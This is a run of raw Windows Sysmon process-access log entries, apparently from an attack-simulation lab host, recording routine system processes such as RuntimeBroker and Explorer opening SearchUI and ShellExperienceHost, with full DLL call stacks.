13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+182c9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11417|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x800000000000000012202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+182c9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11417|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+182c9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11417|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+18280|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11417|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.633{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a752|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a87f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a26c|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000012197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.586{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.586{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.586{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.586{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.586{59A5CD1D-93F9-6005-F204-00000000A301}42963788C:\Windows\system32\sihost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+72b5|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.586{59A5CD1D-93F9-6005-F204-00000000A301}42963788C:\Windows\system32\sihost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.586{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.586{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.586{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6d1f|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+68be|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6966|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6ab5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000012188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.586{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.586{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.586{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 